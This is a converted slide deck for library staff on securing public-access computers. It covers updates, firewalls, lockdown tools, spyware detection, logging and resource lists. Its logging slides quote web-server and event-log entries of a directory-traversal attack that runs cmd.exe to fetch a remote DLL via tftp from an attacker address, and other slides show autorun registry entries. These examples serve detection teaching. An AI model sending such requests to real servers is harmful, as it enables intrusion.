Secure Public Access Computing

1
Secure Public Access Computing

• Marr Madden, CISSP
• marr_at_gatesfoundation.org

2
Schedule

• My background.
• Live meeting operations.
• Pre-webcast survey
• Interested inTrojans, spyware, adware
• Most have secure public access pcs
• Gates, Centurion, Fortres
• Most looking for resources and information
• Most use anti-virus
• Products and sites mentioned are not
  endorsements!
• Lets talk security.
• Light snacks and naps.

Hyperlinks in Live Meeting dont work so this
PowerPoint presentation is available for
download http//webjunction.org/do/DisplayContent
?id8206
3
Resume

• Highlights -
• Currently (for 1 more day) with bmgf, designing
  library networks and securing web servers.
• Former software tester at Microsoft
• Former IT Manager
• Former Deputy U.S. Marshal
• Current CISSP, Certified Information Systems
  Security Professional
• Need job, will travel

• Marr Madden
• CISSP, CCNA, MCSE
• Summary
• A results-driven professional dedicated to secure
  network computing.
• Project management for complex tech issues
• Security policy creation
• Law enforcement experience
• Security assessments
• IT manager
• Employment
• Present-1999
• Bill Melinda Gates Foundation, Seattle, WA
• Network Design Security Specialist
• Project manager for wireless, LAN, WAN and
  security projects in the deployment
• of 47,000 computers and 250 routers. Galvanized
  the security initiative for
• the U.S. library program, creating security
  policies, procedures and training
• materials. Team lead in securing granted web
  servers, wireless equipment,
• routers and switches. Public speaking topics
  include security and secure
• public access computing.

4
The Basic Premise

• Defense in Depth have multiple lines of
  defense!
• Barriers facing the Internet
• Internet Router
• Firewall
• Switches, vlans, DMZs and segmentation
• Personal firewalls
• Up-to-date OS and anti-virus on computers
• Secure public access solution for computers
• If all else fails, restoration from known good
  point or media
• Caution This a very basic overview. There are
  many more options and methods that can be taken
  to secure your networks. You also need to
  protect your assets from attacks originating on
  you network

5
If Microsoft Corp. Security Center sent you an
email with an attached tool to install a
security update would you do it?
6
Microsoft will never email you!
7
Six Steps Toward Secure Public Access Computing
Lets start with the basics

• Keep Windows up-to-date
• Install anti-virus software and auto update
• Get a firewall
• Secure public access environment
• Keep applications up-to-date
• Keep spyware/adware and trojans away

8
Keep Windows Up-To-Date

• Microsofts security website has a tool that lets
  them scan your computer for the latest updates
  and patches. http//windowsupdate.microsoft.com
• Enable Windows automatic updates
• XP StartgtSettingsgtControl PanelgtSystemgtAutomatic
  Updates
• XP SP2 StartgtSettingsgtControl PanelgtSecurity
  Center
• Win 2k ME StartgtSettingsgtControl
  PanelgtAutomatic Updates
• Apple Security http//www.info.apple.com/usen/sec
  urity/index.html
• Microsoft security website http//www.microsoft.c
  om/security/

9
Install Anti-Virus Software.Use the Live Update
Feature.

• Full feature anti-virus suites now include IDS,
  personal firewalls, spam blocking and more. Much
  more memory intensive
• Use the live update feature to schedule downloads
  of current virus definitions.
• Renew your subscriptions!
• http//www.symantec.com
• http//mcafee.com
• http//www.pandasoftware.com
• http//free.grisoft.com/freeweb.php/doc/1/
• List of free web virus scanners
  http//www.pcworld.com/downloads/collection/0,coll
  id,1259,00.asp

10
Firewalls
Software or a hardware device that can filter
traffic base on policy.

• Packet filters source or destination address,
  ports, or protocol. Router access control lists
  are one example of packet filters.
• Stateful packet filters allow return traffic
  only if the source is from your network.
• Application layer (proxies) can filter
  applications, ie ftp, telnet. Can get very
  specific, ie. Blocking http get or post requests.
  Client configuration required and may slow
  network performance. Considered the most secure
  firewall.
• http//www.firewallguide.com - a great reference

11
Application Level Firewalls
Application level firewalls are typically
software and also called proxy servers.
Microsofts product, Internet Security and
Acceleration (ISA) server, is able to look at
content and make filtering decisions.
12
(No Transcript)
13
Back to Back Firewalls
The most secure firewalling method is when your
public servers are between two firewalls, in a
DMZ. Having different firewall vendors may keep
you more secure
14
Hardware Firewalls

• Hardware firewalls run on dedicated equipment and
  are usually faster than other firewalls.
• http//www.firewallguide.com/hardware.htm good
  reference
• http//www.cisco.com/en/US/products/hw/vpndevc/ind
  ex.htmlproducts Product list for all Cisco
  security products
• http//www.watchguard.com
• http//www.linksys.com - inexpensive cable/DSL
  firewalls
• http//www.sonicwall.com

15
Software Firewalls

• Applications running on Windows, Linux, Unix or
  Mac machine and may be vulnerable to OS issues.
• http//www.microsoft.com/isaserver/
• http//www.winproxy.com Blue Coat securesuite
• http//www.smoothwall.net proven Open Source

16
Personal Firewalls

• Software running on each PC that can be
  configured to deny/allow traffic.
• Background articles and reviews
  http//www.pcmag.com/article2/0,1759,1618681,00.as
  p
• http//www.firewallguide.com/software.htm
• Zone Labs excellent free personal firewall
  http//www.zonelabs.com/store/content/company/prod
  ucts/znalm/freeDownload.jsp
• Microsoft XP SP2 Only protects from incoming
  traffic. If you have a worm that creates
  traffic, it will pass XP SP2 StartgtSettingsgtCont
  rol PanelgtWindows Firewall

17
Secure Public Access Computing

• Computers in the public space must be reliable,
  secure and as trouble free as possible. Easier
  said than done
• Software Solutions
• Utilizing profile restrictions, file permissions
  and policies, these tools limit the ability to
  read and write to the hard drive or to configure
  the operating system.
• Public Access Security Tool -
• http//pacomputing.org/PACTool/pactoolhome.aspx
• Fortres - http//fortres.com/
• Hardware Solutions
• Lock and key, and a software driver, protects
  your computer from changes. A simple reboot
  restores your image to its previous state.
• Centurion Guard
• http//www.centuriontech.com/centurionguard.htm

18
Secure Public Access Computing

• Domain policies
• http//www.windowsecurity.com/articles/Customizing
  -Windows-Security-Templates.html
• Security templates
• MS Office resource kit limit where users can
  read from and write to.
• Turn off unneeded services
• Null sessions, web servers, ftp servers,
  messenger service, snmp, NetBIOS over tcp/ip,
  file and printer sharing
• Scan yourself for open ports/services.
  Foundstones SuperScan
• Copy, rename and disable original executables
  for extreme cases only
• Format.exe, command.exe, telnet.exe, ftp.exe,
  tftp.exe, cmd.exe - Warning, test after
  renaming!
• Audit access attempts to originals

19
Keep applications Up-to-Date Change Default
Passwords

• Keep your applications up-to-date and change
  default passwords for hardware and software. Use
  passphrases.
• Passphrases, at least 7 characters long. Mix in
  caps and extended characters. For example, My
  library is the 17th Best Mlit17B
• Password lists are on the Internet - that
  includes automation systems!
• Disable guest and rename administrator account
• Up-to-date applications http//webjunction.org/do
  /DisplayContent?id1334
• MS Office http//office.microsoft.com/en-us/offic
  eupdate/default.aspx
• Adobe Acrobat Reader http//www.adobe.com/product
  s/acrobat/readermain.html a must-do for XP SP2.
• Configure IE to check for updates automatically
  by selecting ToolsgtInternet OptionsgtAdvancedgtBrows
  ing, and select Automatically check for Internet
  Explorer updates

20
Physical Security

• Keep servers, routers and switches in a locked
  room with protection from fire, heat, humidity,
  water damage and the public. Control access to
  this room.
• Buy locking cases for pcs.
• Keep machines away from ground floor windows.
• Laptop security is important. Use an encrypted
  file system, require passwords, personal
  firewalls and anti-virus protection.
• Enable auto logoff on pcs and servers.
• Use a BIOS password.
• Disable CD autorun.
• Disable booting from a floppy disk.

21
Blocking USB Ports

• Disable in BIOS settings in modern computers,
  http//techrepublic.com.com/5100-6255-5030674.html
  
• XP SP2 registry changes to block writing
  http//windows.about.com/library/tips/bltip707.htm
  
• Gates model from a WJ USB thread -
  http//webjunction.org/forums/thread.jspa?forumID
  37threadID871messageID9137
• When you plug in a USB drive, it grabs the next
  available letter, the policy restriction only
  allows for the floppy, zip and CD/DVD drive
  letters and no more. The loophole here is if you
  leave the CD/DVD locked out through the Centurion
  Guard, the drive letter it normally uses can now
  be used for a USB device. If you want to
  disallow USB devices, you need to leave the key
  in the "DVD Drive Unlocked, Hard Drive Locked"
  position (in states with a CG with only "locked"
  and "unlocked" settings you need to plug the DVD
  drive in).
• Fortres also uses a restricted drive method
• You will need to block the drive letter (or
  letters) that will be assigned to the drive. For
  instance, if you have a CD-ROM drive already, the
  USB drive will likely be assigned E. On the
  General File Protect window, you will need to
  drop down to the E drive and select No Executing
  on This Drive and/or No Saving on This Drive. If
  you do not want them using the drive at all,
  include . and in the No Access box. You may
  need to do this for other drive letters as well
  if they can be used for the USB drives.

22
Keep Spyware/Adware and Trojans Away

• Spyware is software running in the background
  that can track your habits, redirect searches and
  web pages, display pop-ups and more. Not a good
  thing. Eats up bandwidth and CPU cycles. Can
  read your hard drive and store personal
  information. Spyware is usually installed by
  suspect freeware, shareware and P2P applications.
• Adware is tracking software that reports your
  surfing habits to a central server so advertisers
  can target their efforts based on your patterns
  ie, pop-ups.
• Trojans are applications professing to be one
  thing, but are actually doing something else.
  Frequent trojans are downloadable games (exes).
• Keyloggers are no fun. They are software apps or
  small hardware devices placed between the
  keyboard cable and the pc. They record
  keystrokes for later retrieval. Software
  keyloggers may be detected with spyware detection
  tools. Hardware keyloggers are very difficult to
  detect.
• Anti-spyware links http//www.pcworld.com/downloa
  ds/file_description/0,fid,22262,00.asp
• Spybot Search Destroy http//www.safer-networki
  ng.org/en/index.html
• Ad-aware http//www.lavasoftusa.com/software/adaw
  are/

23
Spyware and Trojan Detection, the hard way

• System files
• Win.ini - Adds the Trojan file name to the run
  or load lines.
• System.ini - Adds the Trojan file name to the
  shell line. There should be nothing after
  shell Explorer.exe.
• Autoexec.bat - Adds the Trojan file name to any
  line.
• Registry entries. Look for suspicious key
  values.
• HKLM/Software/Microsoft/Windows/CurrentVersion/Run
   
• HKLM/Software/Microsoft/Windows/CurrentVersion
  /RunOnce
• HKLM/Software/Microsoft/Windows/CurrentVersion
  /RunServices
• HKLM/Software/Microsoft/Windows/CurrentVersion
  /RunServicesOnce
• Also Check HKEY_CURRENT_USER for
  Run/RunOnce/RunServices/RunServicesOnce keys
• Spyware detection programs - the easy way
• Spyware solutions review. http//www.pcmag.com/art
  icle2/0,4149,1524223,00.asp

24
More Registry Settings
HKCU\Software\Microsoft\Windows\CurrentVersion\Exp
lorer\Shell Folders. Startup"SystemRoot\badstu
ff.exe"   HKCU\Software\Microsoft\Windows\CurrentV
ersion\Explorer\User Shell Folders.
Startup"SystemRoot\badstuff.exe""   HKLM\Softwa
re\Microsoft\Windows\CurrentVersion\explorer\User
Shell Folders. Common Startup"SystemRoot\badst
uff.exe"   HKLM\Software\Microsoft\Windows\Current
Version\explorer\Shell Folders. Common
Startup"SystemRoot\badstuff.exe"
25
And Now A Word About Housekeeping
26
Gather Contact Information and Records

• Store the originals in a safe place and make
  copies for daily use, if needed
• Telephone company account and contact
  information.
• ISP contact information with your username and
  password. Include mail server addresses and
  account info.
• Local technical support contact information.
• Emergency contact information.
• Documentation for hardware, warranties, software
  and licenses.
• Anti-virus registration numbers and expiration
  dates!

27
Document Everything

• Document current assets, data and intellectual
  property.
• Document software and license information.
• Document your network. Detail IP addresses,
  users, services and hardware. Know whats
  running, whos running it and where its located.

28
Wireless Security

• Segregate wireless from anything important!
• Change access point default password
• Change default SSID
• Disable SSID broadcast
• No DHCP
• Require WEP or better. WPA, if hardware supports
  it.
• Limit power to the confines of building
• MAC address filtering
• Use non-standard address range
• Use a VPN
• http//www.pcmag.com/article2/0,4149,1276349,00.as
  p
• http//www.giac.org/practical/GCIA/Tu_Niem_GCIA.pd
  f

29
Test Your Network

• Port scanners
• Gibson Research. ShieldsUP! https//grc.com/x/ne.
  dll?bh0bkyd2
• Download Foundstones SuperScan -
  http//www.foundstone.com/index.htm?subnavresourc
  es/navigation.htmsubcontent/resources/proddesc/s
  uperscan.htm
• Microsoft Baseline Security Analyzer
• Set up logging and auditing.
• from IP address, 12/3/01, 214346, W3SVC,
  192.168.101.241, 200, GET, /scripts/..5c../winnt/
  system32/cmd.exe, /ctftp20-i20 bad guy IP
  address 20 GET20Admin.dll20e\Admin.dll
• Packet analysis with Ethereal

30
Command Line Tools

• Netstat A tool that shows current connections
  and ports being used or ports that are open and
  listening for connection requests.
• Nestat an
• Active Connections
• Proto Local Address Foreign Address
  State
• TCP 192.168.1.780 0.0.0.00
  LISTENING
• TCP 192.168.1.7110 0.0.0.00
  LISTENING
• TCP 192.168.1.71914 206.65.183.1880
  CLOSE_WAIT
• MS Port reporter/logger http//support.microsoft.
  com/?id837243
• Ping Diagnostic tool for testing reachability.
• Ping yahoo.com
• Pinging yahoo.com 216.109.112.135 with 32 bytes
  of data
• Reply from 216.109.112.135 bytes32 time74ms
  TTL49
• Reply from 216.109.112.135 bytes32 time81ms
  TTL49
• Reply from 216.109.112.135 bytes32 time73ms
  TTL49
• Reply from 216.109.112.135 bytes32 time72ms
  TTL49
• Ping statistics for 216.109.112.135
• Packets Sent 4, Received 4, Lost 0 (0
  loss),

31
Command Line Tools contd

• Nslookup Tests DNS lookups using the configured
  DNS server.
• nslookup cnn.com
• Non-authoritative answer
• Server dns.sea1.speakeasy.net
• Address 66.93.87.2
• Name cnn.com
• Addresses 64.236.16.20, 64.236.16.52,
  64.236.16.84, 64.236.16.116
• 64.236.24.4, 64.236.24.12, 64.236.24.20,
  64.236.24.28
• Hosts file Manual entry for name resolution.
• Tracert Diagnostic tool for tracing the path to
  a destination.

32
Auditing

• How to set up auditing
• http//support.microsoft.com/default.aspx?scidkb
  en-usq310399sdtech
• http//www.auditingwindows.com/cms/index.php

Logon and Logoff Success, Failure File and
Object Access Success, Failure Use of User
Rights Failure User and Group
Management Success, Failure Security Policy
Changes Success, Failure Restart, Shutdown and
System Success, Failure Process
Tracking Failure
33
Web Server Logging

• IIS logging
• http//support.microsoft.com/default.aspx?scidkb
  en-us300390sdtech
• http//techrepublic.com.com/5100-6268-1051006.html
  

Http Error Codes 200 Series codes indicate
success.200 OK 201 Created 300 Series codes
indicate the action to be taken. 304 Not
Modified 305 Use Proxy 400 Errors indicate
client error400 Bad Request 401 Unauthorized
403 Forbidden404 Not Found 405 Method Not
Allowed 407 Proxy Authentication Required 408
Request Time-Out      
500 Errors indicate a server error 500 Server
Error 501 Not Implemented 502 Bad Gateway 503
Out of Resources 504 Gateway Time-Out 505 HTTP
Version not supported
34
Web Server Logging Example

• x.x.x.x, -, 12/2/01, 83244, W3SVC, JACKP,
  192.168.101.241, 0, 72, 273, 403, 5, GET,
  /scripts/root.exe, /cdir,
• x.x.x.x, -, 12/2/01, 83245, W3SVC, JACKP,
  192.168.101.241, 47, 155, 304, 200, 0, GET,
  /scripts/..5c../winnt/system32/cmd.exe,
  /ctftp20-i20x.x.x.x20GET20cool.dll20c\httpo
  dbc.dll,

35
Event Viewer

• The event viewer is a great place to start for
  troubleshooting. StartgtProgramsgtAdministrative
  ToolsgtEvent Viewer. There are three log
  catagories System, Security, and Application.
  There are three types of events Informational,
  Warning, Errors but Security events have Success
  Audit and Failure Audit.
• System log service and driver failures and
  successes
• Security log Administrator selects what will be
  logged here by determining auditing events.
  Security logs are only viewable by the
  administrator.
• Application log application developers decide
  what gets logged here.
• Event viewer codes http//www.microsoft.com/techn
  et/support/eventserrors.mspx
• An Event Log Entry
• The script started from the URL '/MSADC/root.exe'
  with parameters '/ctftp20-i20208.21.12.14120GE
  T20Admin.dll20Admin.dll' has not responded
  within the configured timeout period. The HTTP
  server is terminating the script

36
FTP Logging Codes

• Ftp Error Codes
• 200 Command okay.212 Directory status.213 File
  status.221 Service closing control
  connection.225 Data connection open no transfer
  in progress.226 Closing data connection.
  Requested file action successful (for example,
  file transfer or file abort).227 Entering
  Passive Mode (h1,h2,h3,h4,p1,p2).230 User logged
  in, proceed. Logged out if appropriate.250
  Requested file action okay, completed.
• 300 Errors indicate command accepted but needs
  more information331 User name okay, need
  password.332 Need account for login.350
  Requested file action pending further information

400 Errors indicate the command was accepted but
a temporary error condition is happening.
Request can be sent again.421 Service not
available, closing control connection. This may
be a reply to any command if the service knows it
must shut down.425 Can't open data
connection.426 Connection closed transfer
aborted. 450 Requested file action not
taken.451 Requested action aborted. Local error
in processing.452 Requested action not taken.
Insufficient storage space in system. File
unavailable (e.g., file busy) etc.   500 Syntax
error, command unrecognized. This may include
errors such as command line too long.501 Syntax
error in parameters or arguments.502 Command not
implemented. 530 Not logged in.532 Need account
for storing files.550 Requested action not
taken. File unavailable (e.g., file not found, no
access). 552 Requested file action aborted.
Exceeded storage allocation (for current
directory or dataset).553 Requested action not
taken. File name not allowed.
37
FTP Logging Example

• 075455 213.11.205.X USER anonymous 331
• 075455 213.11.205.X PASS
  guest_at_anonymous.com 230
• 075500 80.11.191.Q created ulstigl.r31
  226
• 075508 213.11.205.X QUIT - 226
• 075736 80.8.16.Z sent /_vti_pvt/tmp/tagge
  d_by/indian's/upped_by/patzy/pixar_renderman/pixar
  _renderman.r02 226
• 075804 80.11.191.Q created ulstigl.r32
  226
• 080109 80.11.191.Q created ulstigl.r33
  226
• 080413 80.11.191.Q created ulstigl.r34
  226

38
Ports, Services and Protocols

• Port lists.
• http//www.iana.org/assignments/port-numbers
• http//www.seifried.org/security/ports/
• MS port reporter/logger - http//support.microsoft
  .com/?id837243
• Services.
• http//www.blackviper.com/ - MS services what
  they are and their dependencies. Personal site
  from an interesting guy.
• http//www.microsoft.com/windows2000/techinfo/howi
  tworks/management/w2kservices.asp
• Protocols
• http//www.protocols.com/pbook/tcpip1.htm

39
Create a Data Backup and Image Restoration Policy

• Backup current data on a timely and regular
  basis.
• Dont backup anything that can be restored via
  CD.
• Learn about your vendors system and data backup
  options.
• For workstation restoration check out disk
  cloning software such as Symantecs Ghost
  product.
• Microsofts backup product for XP and 2K Start
  gt Programs gt Accessories gt System Tools gt Backup.
  

40
More Info

• The basics. http//computer.howstuffworks.com
• Securityfocus.com. An Excellent site for
  numerous platforms and technologies. Home of
  bugtraq mailing list. http//www.securityfocus.co
  m
• Firewallguide.com. A good starting point for
  security concerns. http//www.firewallguide.com
• Sans.org. Excellent security resource for
  training and current issues. http//www.sans.org.
  
• Home of the FBI/sans top twenty
  http//www.sans.org/top20
• Microsoft security site. http//www.microsoft.com
  /security
• Latest Apple security update, 2/27/04.
  http//www.apple.com/support/security/security_upd
  ates.html
• Red Hat security site. http//www.redhat.com/supp
  ort/alerts/

41
Keeping Current with RSS Security Feeds

• Most recent anti-virus headlines
  http//z.about.com/6/g/antivirus/b/index.xml
• Cert.org is an excellent resource and their
  us-cert.gov RSS feeds are configurable for
  technical, non-technical and general audiences
  http//www.us-cert.gov/channels/tips.rdf
• Network World security research center
  http//www.nwfusion.com/rss/security.xml
• Sans.org is an excellent training and security
  resource.http//www.sans.org/newsletters/newsbite
  s/rss/
• Their Internet Storm Center watches trends and
  has informationhttp//isc.sans.org/rssfeed.xml?i
  scf19768f24ca6f16d9147eae6c79ecd34
• Securityfocus.org  - for more advanced
  information.
• News http//www.securityfocus.com/rss/news.xml
• Vulnerabilities/bugtraqhttp//www.securityfocus.c
  om/rss/vulnerabilities.xml
• MS security RSS - http//www.microsoft.com/technet
  /security/bulletin/secrss.aspx

42
Keeping Current with Lists

• E-mail notifications and mailing lists
• http//securityfocus.org/archive - the most
  comprehensive and current lists available. The
  security basics list is a great place to start in
  your quest for security information. For more
  detailed information, Bugtraq is the source and
  is widely respected.
• http//listserv.utk.edu/archives/libnt-l.html -
  library-focused listserv with active members and
  current content. Post your questions here and
  you will receive an answer.
• http//webjunction.org/do/DisplayContent?id711 -
  a great resource that also covers forums and
  boards.
• http//register.microsoft.com/subscription/subscri
  beme.asp?ID135 - Microsofts email notification
  service that is notoriously late in delivering
  content.

43
Keeping Current with Newsletters

• Newsletters are perhaps the least current means,
  but in many ways their readability outweighs
  their timeliness concerns.
• http//www.sans.org/newsletters - sans.org is an
  excellent and well-respected security
  organization that also provides newsletters.
  Check out OUCH! for basic security concerns like
  phishing or e-mail scams.
• http//dispatch.mcafee.com/us - anti-virus vendor
  McAfee offers a newsletter
• http//securityresponse.symantec.com/avcenter/news
  letter.html - anti-virus vendor Symantec offers a
  newsletter
• http//www.pcmag.com/category2/0,1738,1356337,00.a
  sp - PC Magazine offers a security newsletter.

44
Tools

• Foundstone.com home of SuperScan and more!
  http//www.foundstone.com/index.htm?subnavresourc
  es/navigation.htmsubcontent/resources/freetools.
  htm
• Sysinternals.com - many utilities you wish MS
  would have includedhttp//www.sysinternals.com/nt
  w2k/utilities.shtml
• Sourceforge Open Source heaven.
  http//sourceforge.net/
• Microsoft tools IIS lockdown, baselines
  security analyzer, worm removal tools,
  http//www.microsoft.com/technet/security/tools/de
  fault.mspx

45
If All Else Fails
Place a Placard Next to Each Computer

• Please read before using the computer
• The library staff has made every effort to
  provide a secure computing environment but we can
  not guarantee the confidentiality of your data.
• Please use extreme care when using private
  information. This includes username and
  passwords, pin numbers, email, and private data.
• Thank you.
• Please dont sue us.